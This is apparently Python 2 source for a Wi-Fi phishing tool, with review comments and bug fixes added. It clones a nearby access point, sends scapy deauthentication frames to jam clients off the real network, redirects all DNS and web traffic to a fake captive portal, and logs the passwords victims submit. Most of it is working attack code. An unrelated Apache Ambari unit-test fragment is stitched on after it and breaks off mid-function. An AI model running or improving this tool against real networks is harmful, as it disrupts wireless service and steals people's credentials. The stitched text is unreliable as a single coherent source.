                    help="Choose the number of packets to send in each deauth burst. Default value is 1; 1 packet to the client and 1 packet to the AP. Send 2 deauth packets to the client and 2 deauth packets to the AP: -p 2")
    ap.add_argument("-d", "--directedonly", action='store_true',
                    help="Skip the deauthentication packets to the broadcast address of the access points and only send them to client/AP pairs")
    ap.add_argument("-a", "--accesspoint",
                    help="Enter the MAC address of a specific access point to target")
    return ap.parse_args()
class SecureHTTPServer(BaseHTTPServer.HTTPServer):
    """
    Simple HTTP server that extends the SimpleHTTPServer standard
    module to support the SSL protocol.

    Only the server is authenticated while the client remains
    unauthenticated (i.e. the server will not request a client
    certificate).

    It also reacts to self.stop flag.
    """

    def __init__(self, server_address, HandlerClass):
        # Deliberately skip HTTPServer.__init__ (which would bind a plain
        # TCP socket) and call BaseServer.__init__ directly so the socket
        # can be replaced with an SSL-wrapped one before binding.
        SocketServer.BaseServer.__init__(self, server_address, HandlerClass)
        fpem = PEM  # single PEM file holding both key and certificate
        # NOTE(review): instantiating ssl.SSLSocket directly is a private
        # API and is rejected by modern Python (use ssl.wrap_socket /
        # SSLContext.wrap_socket instead) -- confirm the target interpreter.
        self.socket = ssl.SSLSocket(
            socket.socket(self.address_family, self.socket_type),
            keyfile=fpem,
            certfile=fpem
        )
        self.server_bind()
        self.server_activate()

    def serve_forever(self):
        """
        Handles one request at a time until stopped.
        """
        # `stop` is flipped to True by the handler's do_QUIT.
        self.stop = False
        while not self.stop:
            self.handle_request()
class SecureHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    """
    Request handler for the HTTPS server. It responds to
    everything with a 301 redirection to the HTTP server.
    """

    def do_QUIT(self):
        """
        Sends a 200 OK response, and sets server.stop to True
        """
        self.send_response(200)
        self.end_headers()
        self.server.stop = True

    def setup(self):
        # Build buffered file objects over the SSL connection for the base
        # handler to use. NOTE(review): socket._fileobject is a private
        # Python 2 API that does not exist on Python 3 -- confirm runtime.
        self.connection = self.request
        self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
        self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)

    def do_GET(self):
        # Redirect every HTTPS GET to the plain-HTTP server on port PORT.
        self.send_response(301)
        self.send_header('Location', 'http://10.0.0.1:' + str(PORT))
        self.end_headers()

    def log_message(self, format, *args):
        # Suppress the default per-request stderr logging.
        return
class HTTPServer(BaseHTTPServer.HTTPServer):
    """
    HTTP server whose request loop honours a ``stop`` flag.
    """

    def serve_forever(self):
        """
        Process incoming requests one at a time until self.stop is set.
        """
        self.stop = False
        while True:
            if self.stop:
                break
            self.handle_request()
class HTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    """
    Request handler for the HTTP server that serves the phishing page,
    logging GET hits and captured POST values to a temp file.
    """

    def do_QUIT(self):
        """
        Sends a 200 OK response, and sets server.stop to True
        """
        self.send_response(200)
        self.end_headers()
        self.server.stop = True

    def do_GET(self):
        """Serve .html pages from the phishing directory; log page hits."""
        if self.path == "/":
            # Record the visitor's IP for display elsewhere.
            with open("/tmp/wifiphisher-webserver.tmp", "a+") as log_file:
                log_file.write('[' + T + '*' + W + '] ' + O + "GET " + T +
                               self.client_address[0] + W + "\n"
                               )
            self.path = "index.html"

        self.path = "%s/%s" % (PHISING_PAGE, self.path)
        if self.path.endswith(".html"):
            if not os.path.isfile(self.path):
                self.send_response(404)
                # BUG FIX: terminate the 404 response; without
                # end_headers() the client waits for headers forever.
                self.end_headers()
                return
            self.send_response(200)
            # BUG FIX: 'text-html' is not a valid MIME type.
            self.send_header('Content-type', 'text/html')
            self.end_headers()
            # Send file content to client; `with` guarantees the file is
            # closed even if the write fails.
            with open(self.path) as f:
                self.wfile.write(f.read())
            return
        # Leave binary and other data to default handler.
        else:
            SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)

    def do_POST(self):
        """Capture submitted form values and redirect to the next page."""
        form = cgi.FieldStorage(
            fp=self.rfile,
            headers=self.headers,
            environ={'REQUEST_METHOD': 'POST',
                     'CONTENT_TYPE': self.headers['Content-Type'],
                     })
        for item in form.list:
            if item.value:
                # Log only printable-ASCII values (raw string avoids the
                # invalid-escape warning for \A).
                if re.match(r"\A[\x20-\x7e]+\Z", item.value):
                    self.send_response(301)
                    self.send_header('Location', '/upgrading.html')
                    self.end_headers()
                    with open("/tmp/wifiphisher-webserver.tmp", "a+") as log_file:
                        log_file.write('[' + T + '*' + W + '] ' + O + "POST " +
                                       T + self.client_address[0] +
                                       R + " password=" + item.value +
                                       W + "\n"
                                       )
                    return

    def log_message(self, format, *args):
        # Suppress the default per-request stderr logging.
        return
def stop_server(port=PORT, ssl_port=SSL_PORT):
    """
    Ask both local servers to shut down by issuing the custom QUIT verb
    to the HTTP server on <port> and the HTTPS server on <ssl_port>.
    """
    http_conn = httplib.HTTPConnection("localhost:%d" % port)
    http_conn.request("QUIT", "/")
    http_conn.getresponse()
    https_conn = httplib.HTTPSConnection("localhost:%d" % ssl_port)
    https_conn.request("QUIT", "/")
    https_conn.getresponse()
def shutdown():
    """
    Shutdowns program.

    Flushes the iptables rules added at startup, kills the helper
    daemons, removes temporary state files, restores the wireless
    interfaces and exits the process.
    """
    # Flush and delete filter- and nat-table rules/chains.
    os.system('iptables -F')
    os.system('iptables -X')
    os.system('iptables -t nat -F')
    os.system('iptables -t nat -X')
    # Stop the rogue-AP / DHCP / hostapd helper processes.
    os.system('pkill airbase-ng')
    os.system('pkill dnsmasq')
    os.system('pkill hostapd')
    if os.path.isfile('/tmp/wifiphisher-webserver.tmp'):
        os.remove('/tmp/wifiphisher-webserver.tmp')
    if os.path.isfile('/tmp/wifiphisher-jammer.tmp'):
        os.remove('/tmp/wifiphisher-jammer.tmp')
    if os.path.isfile('/tmp/hostapd.conf'):
        os.remove('/tmp/hostapd.conf')
    # Put monitor-mode interfaces back into managed mode.
    reset_interfaces()
    print '\n[' + R + '!' + W + '] Closing'
    sys.exit(0)
def get_interfaces():
    """
    Parse `iwconfig` output and classify wireless interfaces.

    Returns a dict with three lists: interfaces currently in monitor
    mode, managed-mode 802.11 interfaces, and all wireless interfaces.
    """
    interfaces = {"monitor": [], "managed": [], "all": []}
    output = Popen(['iwconfig'], stdout=PIPE, stderr=DN).communicate()[0]
    for line in output.split('\n'):
        # Interface names only appear on non-empty, non-indented lines.
        if not line or line.startswith(' '):
            continue
        # Skip wired NICs (eth*, em*, pXpY naming schemes).
        if re.search('eth[0-9]|em[0-9]|p[1-9]p[1-9]', line):
            continue
        iface = line[:line.find(' ')]
        if 'Mode:Monitor' in line:
            interfaces["monitor"].append(iface)
        elif 'IEEE 802.11' in line:
            interfaces["managed"].append(iface)
        interfaces["all"].append(iface)
    return interfaces
def get_iface(mode="all", exceptions=None):
    """
    Return the first interface of the given mode that is not listed in
    *exceptions*, or False when none qualifies.

    mode       -- key into get_interfaces(): "all", "managed" or "monitor"
    exceptions -- iterable of interface names to skip (default: ["_wifi"])
    """
    # Fix: avoid a mutable default argument; keep the historical default.
    if exceptions is None:
        exceptions = ["_wifi"]
    for iface in get_interfaces()[mode]:
        if iface not in exceptions:
            return iface
    return False
def reset_interfaces():
    """
    Put every monitor-mode interface back into managed mode.

    Interfaces created by airmon-ng (name contains 'mon') are stopped
    via airmon-ng; anything else is cycled down, switched to managed
    mode and brought back up.
    """
    for iface in get_interfaces()["monitor"]:
        if 'mon' in iface:
            Popen(['airmon-ng', 'stop', iface], stdout=DN, stderr=DN)
            continue
        Popen(['ifconfig', iface, 'down'], stdout=DN, stderr=DN)
        Popen(['iwconfig', iface, 'mode', 'managed'], stdout=DN, stderr=DN)
        Popen(['ifconfig', iface, 'up'], stdout=DN, stderr=DN)
def get_internet_interface():
    '''return the wifi internet connected iface'''
    # Look for a default route leaving through a wlan* interface; that
    # interface provides the upstream internet connectivity.
    # Fix: removed the dead `ipprefix` local (never used here) and the
    # redundant `inet_iface` indirection.
    proc = Popen(['/sbin/ip', 'route'], stdout=PIPE, stderr=DN)
    for line in proc.communicate()[0].split('\n'):
        if 'wlan' in line and 'default via' in line:
            # e.g. "default via 192.168.1.1 dev wlan0 ..." -> field 4
            return line.split()[4]
    return False
def get_internet_ip_prefix():
    '''return the wifi internet connected IP prefix'''
    # The first two characters of the default gateway address are enough
    # to distinguish the 192.*, 172.* and 10.* private ranges.
    # Fix: removed the dead `inet_iface` local (assigned, never used).
    proc = Popen(['/sbin/ip', 'route'], stdout=PIPE, stderr=DN)
    for line in proc.communicate()[0].split('\n'):
        if 'wlan' in line and 'default via' in line:
            return line.split()[2][:2]
    return False
def channel_hop(mon_iface):
    """
    Cycle *mon_iface* through 2.4 GHz channels 1-11 (one hop per second)
    while the global hop_daemon_running flag stays True.

    On `iw` failure an explanatory message is stored in `err` under the
    global lock.
    """
    chan = 0
    err = None
    while hop_daemon_running:
        try:
            err = None
            # Fix: the old reset-then-increment order briefly tuned to
            # the invalid channel 12 once per sweep; wrap within 1..11
            # (same scheme as channel_hop2).
            chan = chan % 11 + 1
            channel = str(chan)
            iw = Popen(['iw', 'dev', mon_iface, 'set', 'channel', channel], stdout=DN, stderr=PIPE)
            for line in iw.communicate()[1].split('\n'):
                if len(line) > 2:  # iw dev shouldnt display output unless there's an error
                    with lock:
                        err = '['+R+'-'+W+'] Channel hopping failed: '+R+line+W+'\n \
        Try disconnecting the monitor mode\'s parent interface (e.g. wlan0)\n \
        from the network if you have not already\n'
                    break
            time.sleep(1)
        except KeyboardInterrupt:
            sys.exit()
def sniffing(interface, cb):
    """
    Run a blocking scapy sniff on *interface*, feeding every captured
    frame to callback *cb* without storing packets; intended as the
    target of a worker thread.
    """
    sniff(iface=interface, store=0, prn=cb)
def targeting_cb(pkt):
    """
    Scapy sniff callback used during target selection: collect every
    beacon / probe-response into the global APs dict and redraw the
    selection menu.
    """
    global APs, count
    if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
        try:
            # The third 802.11 information element carries the DS
            # parameter set (the channel).
            ap_channel = str(ord(pkt[Dot11Elt:3].info))
        except Exception:
            # Malformed/unsupported frame: ignore it.
            return
        essid = pkt[Dot11Elt].info
        mac = pkt[Dot11].addr2
        if len(APs) > 0:
            for num in APs:
                # NOTE(review): substring match -- an ESSID contained in
                # an already-seen one is skipped; confirm this is the
                # intended de-duplication.
                if essid in APs[num][1]:
                    return
        count += 1
        APs[count] = [ap_channel, essid, mac]
        target_APs()
def target_APs():
    """
    Clear the terminal and print the numbered list of discovered access
    points (channel and ESSID) collected in the global APs dict.
    """
    global APs, count
    os.system('clear')
    print '['+G+'+'+W+'] Ctrl-C at any time to copy an access point from below'
    print 'num ch ESSID'
    print '---------------'
    for ap in APs:
        print G+str(ap).ljust(2)+W+' - '+APs[ap][0].ljust(2)+' - '+T+APs[ap][1]+W
def copy_AP():
    """
    Prompt the user for the number of the AP to clone and return its
    (channel, essid, mac) triple from the global APs dict.
    """
    global APs, count
    copy = None
    while not copy:
        try:
            copy = raw_input('\n['+G+'+'+W+'] Choose the ['+G+'num'+W+'] of the AP you wish to copy: ')
            copy = int(copy)
        except Exception:
            # Non-numeric input: ask again.
            copy = None
            continue
    # NOTE(review): a number that is not a key of APs raises KeyError
    # here -- confirm whether input validation is expected upstream.
    channel = APs[copy][0]
    essid = APs[copy][1]
    # A single NUL byte means a hidden ESSID; substitute a blank name.
    if str(essid) == "\x00":
        essid = ' '
    mac = APs[copy][2]
    return channel, essid, mac
def start_ap(mon_iface, channel, essid, args):
    """
    Write a minimal hostapd configuration cloning the chosen AP and
    launch hostapd in the background on *mon_iface*.
    """
    print '['+T+'*'+W+'] Starting the fake access point...'
    config = ('interface=%s\n'
              'driver=nl80211\n'
              'ssid=%s\n'
              'hw_mode=g\n'
              'channel=%s\n'
              'macaddr_acl=0\n'
              'ignore_broadcast_ssid=0\n'
              )
    with open('/tmp/hostapd.conf', 'w') as dhcpconf:
        dhcpconf.write(config % (mon_iface, essid, channel))
    Popen(['hostapd', '/tmp/hostapd.conf'], stdout=DN, stderr=DN)
    try:
        time.sleep(6)  # Copied from Pwnstar which said it was necessary?
    except KeyboardInterrupt:
        # NOTE(review): cleanup() is not defined anywhere in this file;
        # confirm it exists elsewhere or this should call shutdown().
        cleanup(None, None)
def dhcp_conf(interface):
    """
    Write a dnsmasq configuration for *interface* and return its path.

    The DHCP range is chosen so it does not collide with the upstream
    network: 10.0.0.x normally, or 172.16.0.x when the upstream already
    uses a 10.x gateway.
    """
    config = (  # disables dnsmasq reading any other files like /etc/resolv.conf for nameservers
        'no-resolv\n'
        # Interface to bind to
        'interface=%s\n'
        # Specify starting_range,end_range,lease_time
        'dhcp-range=%s\n'
        # Resolve every DNS name to the captive-portal address
        'address=/#/%s'
    )
    ipprefix = get_internet_ip_prefix()
    if ipprefix == '19' or ipprefix == '17' or not ipprefix:
        with open('/tmp/dhcpd.conf', 'w') as dhcpconf:
            dhcpconf.write(config % (interface, '10.0.0.2,10.0.0.100,12h', '10.0.0.1'))
    elif ipprefix == '10':
        with open('/tmp/dhcpd.conf', 'w') as dhcpconf:
            # Fix: the catch-all DNS answer previously pointed at
            # 10.0.0.1 even though this branch serves 172.16.0.x and
            # dhcp() assigns 172.16.0.1 as the gateway.
            dhcpconf.write(config % (interface, '172.16.0.2,172.16.0.100,12h', '172.16.0.1'))
    return '/tmp/dhcpd.conf'
def dhcp(dhcpconf, mon_iface):
    """
    Start dnsmasq with the generated config and give *mon_iface* the
    gateway address matching the DHCP range chosen by dhcp_conf().
    """
    # Start from an empty lease database.
    os.system('echo > /var/lib/misc/dnsmasq.leases')
    dhcp = Popen(['dnsmasq', '-C', dhcpconf], stdout=PIPE, stderr=DN)
    ipprefix = get_internet_ip_prefix()
    # NOTE(review): MTU lowered to 1400 -- presumably to avoid
    # fragmentation issues behind the fake AP; confirm.
    Popen(['ifconfig', str(mon_iface), 'mtu', '1400'], stdout=DN, stderr=DN)
    if ipprefix == '19' or ipprefix == '17' or not ipprefix:
        Popen(['ifconfig', str(mon_iface), 'up', '10.0.0.1', 'netmask', '255.255.255.0'], stdout=DN, stderr=DN)
        os.system('route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1')
    else:
        Popen(['ifconfig', str(mon_iface), 'up', '172.16.0.1', 'netmask', '255.255.255.0'], stdout=DN, stderr=DN)
        os.system('route add -net 172.16.0.0 netmask 255.255.255.0 gw 172.16.0.1')
def get_strongest_iface(exceptions=[]):
    """
    Scan with every managed-mode interface and return the one that sees
    the most access points, or False when none is available.

    exceptions -- interface names to skip (the mutable default is only
    read here, never mutated).
    """
    interfaces = get_interfaces()["managed"]
    scanned_aps = []
    for i in interfaces:
        if i in exceptions:
            continue
        count = 0
        proc = Popen(['iwlist', i, 'scan'], stdout=PIPE, stderr=DN)
        for line in proc.communicate()[0].split('\n'):
            if ' - Address:' in line:  # first line in iwlist scan for a new AP
                count += 1
        scanned_aps.append((count, i))
        print '['+G+'+'+W+'] Networks discovered by '+G+i+W+': '+T+str(count)+W
    if len(scanned_aps) > 0:
        # max() over (count, name) tuples picks the highest AP count.
        interface = max(scanned_aps)[1]
        return interface
    return False
def start_mon_mode(interface):
    """
    Switch *interface* into monitor mode via ifconfig/iwconfig and
    return its name.
    """
    print '['+G+'+'+W+'] Starting monitor mode off '+G+interface+W
    try:
        os.system('ifconfig %s down' % interface)
        os.system('iwconfig %s mode monitor' % interface)
        os.system('ifconfig %s up' % interface)
        return interface
    except Exception:
        # NOTE(review): os.system() reports failures via its return
        # value, not exceptions, so this branch is unlikely to trigger.
        sys.exit('['+R+'-'+W+'] Could not start monitor mode')
# Wifi Jammer stuff
def channel_hop2(mon_iface):
    '''
    First time it runs through the channels it stays on each channel for 5 seconds
    in order to populate the deauth list nicely. After that it goes as fast as it can
    '''
    # Jammer channel hopper: either pins the interface to args.channel
    # or cycles channels 1-11, publishing the shared `monchannel` under
    # `lock` for the sniffer/deauth threads.
    global monchannel, first_pass
    channelNum = 0
    err = None
    while 1:
        if args.channel:
            with lock:
                monchannel = args.channel
        else:
            channelNum +=1
            if channelNum > 11:
                channelNum = 1
                with lock:
                    # One full sweep completed; deauth may start now.
                    first_pass = 0
            with lock:
                monchannel = str(channelNum)
        proc = Popen(['iw', 'dev', mon_iface, 'set', 'channel', monchannel], stdout=DN, stderr=PIPE)
        for line in proc.communicate()[1].split('\n'):
            if len(line) > 2:  # iw dev shouldnt display output unless there's an error
                err = '['+R+'-'+W+'] Channel hopping failed: '+R+line+W
        # Refresh the on-disk status file displayed by the main loop.
        output(monchannel)
        if args.channel:
            time.sleep(.05)
        else:
            # For the first channel hop thru, do not deauth
            if first_pass == 1:
                time.sleep(1)
                continue
        deauth(monchannel)
def deauth(monchannel):
    '''
    addr1=destination, addr2=source, addr3=bssid, addr4=bssid of gateway if there's
    multi-APs to one gateway. Constantly scans the clients_APs list and
    starts a thread to deauth each instance
    '''
    pkts = []
    if len(clients_APs) > 0:
        with lock:
            for x in clients_APs:
                client = x[0]
                ap = x[1]
                ch = x[2]
                # Can't add a RadioTap() layer as the first layer or it's a malformed
                # Association request packet?
                # Append the packets to a new list so we don't have to hog the lock
                # type=0, subtype=12?
                if ch == monchannel:
                    # Deauth both directions: AP->client and client->AP.
                    deauth_pkt1 = Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth()
                    deauth_pkt2 = Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth()
                    pkts.append(deauth_pkt1)
                    pkts.append(deauth_pkt2)
    if len(APs) > 0:
        if not args.directedonly:
            with lock:
                for a in APs:
                    ap = a[0]
                    ch = a[1]
                    if ch == monchannel:
                        # Broadcast deauth sent from the AP's BSSID.
                        deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap)/Dot11Deauth()
                        pkts.append(deauth_ap)
    if len(pkts) > 0:
        # prevent 'no buffer space' scapy error http://goo.gl/6YuJbI
        if not args.timeinterval:
            args.timeinterval = 0
        if not args.packets:
            args.packets = 1
        for p in pkts:
            send(p, inter=float(args.timeinterval), count=int(args.packets))
def output(monchannel):
    """
    Rewrite /tmp/wifiphisher-jammer.tmp with the current deauth targets
    (client/AP pairs and lone APs) so the main loop can display them.
    """
    with open("/tmp/wifiphisher-jammer.tmp", "a+") as log_file:
        # NOTE(review): truncate() cuts at the current offset, which for
        # an "a+" file depends on platform/prior writes -- confirm the
        # file is actually emptied as intended.
        log_file.truncate()
        with lock:
            for ca in clients_APs:
                # Entries enriched by AP_check() carry a 4th field (SSID).
                if len(ca) > 3:
                    log_file.write('['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2].ljust(2)+' - '+T+ca[3]+W + '\n')
                else:
                    log_file.write('['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2])
        with lock:
            for ap in APs:
                log_file.write('['+T+'*'+W+'] '+O+ap[0]+W+' - '+ap[1].ljust(2)+' - '+T+ap[2]+W + '\n')
        #print ''
def noise_filter(skip, addr1, addr2):
    """
    Return True when either address belongs to traffic that must never
    be deauthed: broadcast/null addresses, IPv6 multicast, spanning
    tree, IPv4 multicast, our own monitor interface, plus an optional
    extra MAC given in *skip*.
    """
    # Broadcast, broadcast, IPv6mcast, spanning tree, spanning tree, multicast, broadcast
    ignore = ['ff:ff:ff:ff:ff:ff', '00:00:00:00:00:00', '33:33:00:', '33:33:ff:', '01:80:c2:00:00:00', '01:00:5e:', mon_MAC]
    if skip:
        ignore.append(skip)
    for prefix in ignore:
        if prefix in addr1:
            return True
        if prefix in addr2:
            return True
def cb(pkt):
    '''
    Look for dot11 packets that aren't to or from broadcast address,
    are type 1 or 2 (control, data), and append the addr1 and addr2
    to the list of deauth targets.
    '''
    global clients_APs, APs
    # return these if's keeping clients_APs the same or just reset clients_APs?
    # I like the idea of the tool repopulating the variable more
    if args.maximum:
        if args.noupdate:
            # Frozen list: stop collecting once the cap is exceeded.
            if len(clients_APs) > int(args.maximum):
                return
        else:
            # Rolling list: wipe and repopulate once the cap is exceeded.
            if len(clients_APs) > int(args.maximum):
                with lock:
                    clients_APs = []
                    APs = []
    # We're adding the AP and channel to the deauth list at time of creation rather
    # than updating on the fly in order to avoid costly for loops that require a lock
    if pkt.haslayer(Dot11):
        if pkt.addr1 and pkt.addr2:
            # Filter out all other APs and clients if asked
            if args.accesspoint:
                if args.accesspoint not in [pkt.addr1, pkt.addr2]:
                    return
            # Check if it's added to our AP list
            if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
                APs_add(clients_APs, APs, pkt, args.channel)
            # Ignore all the noisy packets like spanning tree
            if noise_filter(args.skip, pkt.addr1, pkt.addr2):
                return
            # Control = 1, data = 2 (management frames are type 0)
            if pkt.type in [1, 2]:
                clients_APs_add(clients_APs, pkt.addr1, pkt.addr2)
def APs_add(clients_APs, APs, pkt, chan_arg):
    """
    Record the AP that sent a beacon/probe-response in *APs* as
    [bssid, channel, ssid], skipping 5 GHz channels, channel mismatches
    (when chan_arg is set) and BSSIDs that are already listed.
    """
    ssid = pkt[Dot11Elt].info
    bssid = pkt[Dot11].addr3
    try:
        # Thanks to airoscapy: the third IE holds the DS channel.
        ap_channel = str(ord(pkt[Dot11Elt:3].info))
        # 2.4 GHz only -- keep 5 GHz APs out of the hopper's range.
        if ap_channel not in [str(c) for c in range(1, 12)]:
            return
        if chan_arg and ap_channel != chan_arg:
            return
    except Exception:
        return
    # Already known? Nothing to do.
    for entry in APs:
        if bssid in entry[0]:
            return
    with lock:
        return APs.append([bssid, ap_channel, ssid])
def clients_APs_add(clients_APs, addr1, addr2):
    """
    Add the (client, AP) address pair to the deauth target list.

    Pairs already present are ignored; when known APs exist the pair is
    validated/enriched through AP_check(), otherwise it is appended
    with the current monitor channel.
    """
    # Already tracked? (no-op when the list is empty)
    for entry in clients_APs:
        if addr1 in entry and addr2 in entry:
            return
    if len(APs) > 0:
        return AP_check(addr1, addr2)
    with lock:
        return clients_APs.append([addr1, addr2, monchannel])
def AP_check(addr1, addr2):
    """
    If either address matches a known AP BSSID, append the pair plus
    that AP's channel and SSID to the global clients_APs list.
    """
    for ap in APs:
        bssid = ap[0].lower()
        if bssid in addr1.lower() or bssid in addr2.lower():
            with lock:
                return clients_APs.append([addr1, addr2, ap[1], ap[2]])
def mon_mac(mon_iface):
    '''
    Return the MAC address of *mon_iface*, read via the SIOCGIFHWADDR
    ioctl (0x8927); technique from
    http://stackoverflow.com/questions/159137/getting-mac-address
    '''
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15]))
    # The hardware address occupies bytes 18-23 of the returned ifreq
    # buffer (Python 2: the buffer is a str, hence ord()).
    mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
    print '['+G+'*'+W+'] Monitor mode: '+G+mon_iface+W+' - '+O+mac+W
    return mac
def sniff_dot11(mon_iface):
    """
    Thread entry point: sniff indefinitely on *mon_iface*, passing each
    frame to the cb() handler without storing it.
    """
    sniff(iface=mon_iface, prn=cb, store=0)
def get_hostapd():
    """
    Ensure /usr/sbin/hostapd exists, offering an apt-get install when it
    does not; abort if the user declines.
    """
    if not os.path.isfile('/usr/sbin/hostapd'):
        # Fix: the prompt wrongly referred to "isc-dhcp-server"; the
        # missing binary here is hostapd.
        install = raw_input('['+T+'*'+W+'] hostapd not found in /usr/sbin/hostapd, install now? [y/n] ')
        if install == 'y':
            os.system('apt-get -y install hostapd')
        else:
            sys.exit('['+R+'-'+W+'] hostapd not found in /usr/sbin/hostapd')
if __name__ == "__main__":
    # Are you root? (geteuid() returns nonzero for non-root users)
    if os.geteuid():
        sys.exit('[' + R + '-' + W + '] Please run as root')
    # Get hostapd if needed
    get_hostapd()
    # Parse args
    args = parse_args()
    # Start HTTP server in a background thread
    Handler = HTTPRequestHandler
    httpd = HTTPServer(("", PORT), Handler)
    print '[' + T + '*' + W + '] Starting HTTP server at port ' + str(PORT)
    webserver = Thread(target=httpd.serve_forever)
    webserver.daemon = True
    webserver.start()
    # Start HTTPS server in a background thread
    Handler = SecureHTTPRequestHandler
    httpd = SecureHTTPServer(("", SSL_PORT), Handler)
    print '[' + T + '*' + W + '] Starting HTTPS server at port ' + str(SSL_PORT)
    secure_webserver = Thread(target=httpd.serve_forever)
    secure_webserver.daemon = True
    secure_webserver.start()
    # Get interfaces: one for monitor/jamming, one for the rogue AP.
    reset_interfaces()
    if not args.jamminginterface:
        inet_iface = get_internet_interface()
        mon_iface = get_iface(mode="monitor", exceptions=[inet_iface])
        iface_to_monitor = False
    else:
        mon_iface = False
        iface_to_monitor = args.jamminginterface
    if not mon_iface:
        if args.jamminginterface:
            iface_to_monitor = args.jamminginterface
        else:
            iface_to_monitor = get_strongest_iface()
        # Short-circuit keeps inet_iface unread when a jamming
        # interface was given on the command line.
        if not iface_to_monitor and not inet_iface:
            sys.exit('['+R+'-'+W+'] No wireless interfaces found, bring one up and try again')
        mon_iface = start_mon_mode(iface_to_monitor)
    wj_iface = mon_iface
    if not args.apinterface:
        ap_iface = get_iface(mode="managed", exceptions=[iface_to_monitor])
    else:
        ap_iface = args.apinterface
    # We got the interfaces correctly at this point. Monitor mon_iface & for the AP ap_iface.
    # Set iptable rules and kernel variables.
    os.system('iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1:%s' % PORT)
    os.system('iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 10.0.0.1:%s' % SSL_PORT)
    Popen(['sysctl', '-w', 'net.ipv4.conf.all.route_localnet=1'], stdout=DN, stderr=PIPE)
    print '[' + T + '*' + W + '] Cleared leases, started DHCP, set up iptables'
    # Copy AP: hop channels and sniff until the user picks a target
    # (sniffing() blocks until interrupted).
    time.sleep(3)
    hop = Thread(target=channel_hop, args=(mon_iface,))
    hop.daemon = True
    hop.start()
    sniffing(mon_iface, targeting_cb)
    channel, essid, ap_mac = copy_AP()
    hop_daemon_running = False
    # Start AP
    dhcpconf = dhcp_conf(ap_iface)
    dhcp(dhcpconf, ap_iface)
    start_ap(ap_iface, channel, essid, args)
    os.system('clear')
    print '[' + T + '*' + W + '] ' + T + \
          essid + W + ' set up on channel ' + \
          T + channel + W + ' via ' + T + mon_iface \
          + W + ' on ' + T + str(ap_iface) + W
    # Reset the jammer state shared with the worker threads.
    clients_APs = []
    APs = []
    DN = open(os.devnull, 'w')
    args = parse_args()
    args.accesspoint = ap_mac
    args.channel = channel
    monitor_on = None
    conf.iface = mon_iface
    mon_MAC = mon_mac(mon_iface)
    first_pass = 1
    monchannel = channel
    # Start channel hopping
    hop = Thread(target=channel_hop2, args=(wj_iface,))
    hop.daemon = True
    hop.start()
    # Start sniffing
    sniff_thread = Thread(target=sniff_dot11, args=(wj_iface,))
    sniff_thread.daemon = True
    sniff_thread.start()
    # Main loop: redraw jammer/DHCP/HTTP status every half second.
    try:
        while 1:
            os.system("clear")
            print "Jamming devices: "
            if os.path.isfile('/tmp/wifiphisher-jammer.tmp'):
                proc = check_output(['cat', '/tmp/wifiphisher-jammer.tmp'])
                lines = proc.split('\n')
                lines += ["\n"] * (5 - len(lines))
            else:
                lines = ["\n"] * 5
            for l in lines:
                print l
            print "DHCP Leases: "
            if os.path.isfile('/var/lib/misc/dnsmasq.leases'):
                proc = check_output(['cat', '/var/lib/misc/dnsmasq.leases'])
                lines = proc.split('\n')
                lines += ["\n"] * (5 - len(lines))
            else:
                lines = ["\n"] * 5
            for l in lines:
                print l
            print "HTTP requests: "
            if os.path.isfile('/tmp/wifiphisher-webserver.tmp'):
                proc = check_output(['tail', '-5', '/tmp/wifiphisher-webserver.tmp'])
                lines = proc.split('\n')
                lines += ["\n"] * (5 - len(lines))
            else:
                lines = ["\n"] * 5
            for l in lines:
                print l
            # We got a victim. Shutdown everything.
            # NOTE(review): `l` leaks from the loop above, so only the
            # LAST of the tailed lines is checked for "password" --
            # confirm this is intended.
            if "password" in l:
                time.sleep(2)
                shutdown()
            time.sleep(0.5)
    except KeyboardInterrupt:
        shutdown()
| |
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from stacks.utils.RMFTestCase import *
import bootstrap
import time
from ambari_commons import subprocess32
import os
import logging
import tempfile
import pprint
from ambari_commons.os_check import OSCheck
from bootstrap import PBootstrap, Bootstrap, BootstrapDefault, SharedState, HostLog, SCP, SSH
from unittest import TestCase
from ambari_commons.subprocess32 import Popen
from bootstrap import AMBARI_PASSPHRASE_VAR_NAME
from mock.mock import MagicMock, call
from mock.mock import patch
from mock.mock import create_autospec
from only_for_platform import not_for_platform, os_distro_value, PLATFORM_WINDOWS
@not_for_platform(PLATFORM_WINDOWS)
class TestBootstrap:#(TestCase):
def setUp(self):
    # Silence everything below ERROR for the duration of these tests.
    logging.basicConfig(level=logging.ERROR)
def test_getRemoteName(self):
    """getRemoteName() embeds a per-file timestamp and caches it:
    asking again for the same file must reuse the first utime, while a
    new file picks up the current utime."""
    shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
                               "setupAgentFile", "ambariServer", "centos6", None, "8440", "root")
    # Fix: dropped the dead `res =` from the chained assignment.
    bootstrap_obj = Bootstrap("hostname", shared_state)
    utime1 = 1234
    utime2 = 12345
